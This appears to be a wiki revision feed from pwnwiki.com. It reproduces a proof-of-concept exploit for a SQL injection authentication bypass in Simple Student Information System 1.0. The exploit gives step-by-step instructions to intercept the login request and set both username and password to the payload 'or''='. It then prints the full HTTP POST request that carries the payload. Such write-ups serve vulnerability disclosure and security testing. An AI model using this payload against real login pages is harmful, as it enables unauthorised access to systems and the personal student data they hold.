https://pwnwiki.com/index.php?action=history&feed=atom&title=Simple_Student_Information_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E Simple Student Information System 1.0 SQL注入漏洞 - Revision history 2026-04-21T04:59:00Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Simple_Student_Information_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1663&oldid=prev Pwnwiki: Created page with "==POC== <pre> # Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar..." 2021-04-14T09:00:03Z <p>Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar...&quot;</p> <p><b>New page</b></p><div>==POC==<br /> &lt;pre&gt;<br /> # Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)<br /> # Date: 13 April 2021<br /> # Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)<br /> # Vendor Homepage: https://www.sourcecodester.com/php/11400/simple-student-information-system-ajax-live-search.html<br /> # Software Link: https://www.sourcecodester.com/download-code?nid=11400&amp;title=Simple+Student+Information+System+using+PHP+with+Source+Code<br /> # Version: 1.0<br /> # Tested on: windows 10<br /> <br /> POC<br /> <br /> Step 1 - Go to url http://localhost/studentinfosystem/index.php<br /> Step 2 – Enter anything in username and password<br /> Step 3 – Click on Login and capture the request in burpsuite<br /> Step 4 – Change the username to 'or''=' and password 'or''='<br /> Step 5 – after entering the payload, you can enter the website<br /> <br /> <br /> POST /studentinfosystem/index.php HTTP/1.1<br /> Host: 192.168.1.14<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)<br /> Gecko/20100101 Firefox/87.0<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> Content-Type: application/x-www-form-urlencoded<br /> Content-Length: 46<br /> Origin: http://192.168.1.14<br /> Connection: close<br /> Referer: http://192.168.1.14/studentinfosystem/index.php<br /> Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe<br /> Upgrade-Insecure-Requests: 1<br /> <br /> username='or''='&amp;password='or''='&amp;login=Log+In<br /> &lt;/pre&gt;</div> Pwnwiki